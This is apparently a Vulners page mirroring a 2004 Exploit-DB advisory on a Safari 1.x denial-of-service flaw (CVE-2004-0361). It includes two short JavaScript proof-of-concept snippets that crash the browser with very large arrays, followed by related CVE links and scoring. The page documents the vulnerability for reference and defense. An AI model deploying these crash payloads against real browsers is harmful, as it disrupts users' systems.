Lucene search
+L

Apple Safari 1.x - Large JavaScript Array Handling Denial of Service

🗓️ 06 Mar 2004 00:00:00Reported by kangType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 25 Views

Apple Safari 1.x can crash from handling large JavaScript arrays due to potential memory corruption.

Related
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2004-0361
18 Mar 200405:00
cve
Cvelist
CVE-2004-0361
18 Mar 200405:00
cvelist
EUVD
EUVD-2004-0361
7 Oct 202500:30
euvd
Tenable Nessus
Mac OS X Multiple Vulnerabilities (Security Update 2004-09-07)
8 Sep 200400:00
nessus
NVD
CVE-2004-0361
23 Nov 200405:00
nvd
source: https://www.securityfocus.com/bid/9815/info

Apple Safari Web Browser is reported to be prone to a security vulnerability related to handling of large JavaScript arrays (with 99999999999999999999999 or 0x23000000 elements). By declaring such an array and then attempting to access it, it may be possible to cause a browser crash.

This issue is likely due to memory corruption but it is not known if it could be further exploitable to execute arbitrary code.

var a = new Array(99999999999999999999999);
a[0+5]="AAAAA";

and:
var bam = new Array(0x23000000);
bam.sort(new Function("return 1"));

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

31 Dec 2012 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25
EPSS0.07045
25